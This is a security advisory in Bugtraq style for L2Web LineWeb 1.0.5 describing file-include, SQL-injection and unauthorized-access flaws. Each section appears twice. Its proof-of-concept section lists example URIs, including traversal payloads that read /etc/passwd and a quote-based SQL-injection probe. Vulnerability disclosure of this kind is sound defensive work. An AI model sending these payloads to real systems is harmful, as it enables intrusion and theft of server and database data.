L2Web LineWeb Multiple Input Validation Vulnerabilities
BID:40577
Info
L2Web LineWeb Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 40577 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 06 2010 12:00AM |
| Updated: | Jan 06 2010 12:00AM |
| Credit: | Ignacio Garrido |
| Vulnerable: |
L2Web LineWeb 1.0.5 |
| Not Vulnerable: | |
Discussion
L2Web LineWeb Multiple Input Validation Vulnerabilities
LineWeb is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple local file-include vulnerabilities, multiple SQL-injection vulnerabilities, and an unauthorized-access vulnerability.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary local scripts in the context of the webserver process, obtain unauthorized access to restricted scripts, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
LineWeb 1.0.5 is vulnerable; other versions may be affected.
LineWeb is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple local file-include vulnerabilities, multiple SQL-injection vulnerabilities, and an unauthorized-access vulnerability.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary local scripts in the context of the webserver process, obtain unauthorized access to restricted scripts, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
LineWeb 1.0.5 is vulnerable; other versions may be affected.
Exploit / POC
L2Web LineWeb Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA
Solution / Fix
L2Web LineWeb Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].